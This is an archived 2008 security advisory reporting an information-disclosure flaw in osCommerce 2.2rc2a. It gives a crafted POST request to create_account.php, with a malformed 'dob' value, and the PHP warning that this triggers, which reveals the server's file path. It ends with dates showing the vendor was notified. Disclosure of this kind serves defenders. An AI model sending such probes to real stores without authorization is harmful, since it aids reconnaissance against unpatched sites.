AOH :: HP Unsorted O :: VA1280.HTM

osCommerce 2.2rc2a - Information Disclosure



osCommerce 2.2rc2a - Information Disclosure
osCommerce 2.2rc2a - Information Disclosure



Application:		osCommerce 2.2rc2a
Authors Site:		http://www.oscommerce.com/ 

+--------------------------------------------------------------+

Information Disclosure:

Manipulation of the 'DOB' Variable on create_account.php can cause
information disclosure:


In this example the POST variable 'DOB' has been set to: FOOBAR

POST /oscommerce/create_account.php

action=process&gender=m&firstname=john&lastname=smith&dob=FOOBAR&email_addre
ss=email@address.com&company=foobar&street_address=foobar&suburb=foobar&post 
code=foobar&city=foobar&state=foobar&country=1&telephone1=123456789&fax=1234
56789&newsletter=on&password=foobar&confirmation=foobar

Result:

Warning: checkdate() expects parameter 3 to be long, string given in
/var/www/oscommerce/create_account.php on line 80


+-[Notes:]-----------------------------------------------------+

Vulnerabilities found on: 05/09/2008
Author(s) Informed on: 06/09/2008
Author(s) Response: None Yet
Author(s) Fix: None Yet


JohnC@NoBytes.com 

http://www.NoBytes.com 




The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.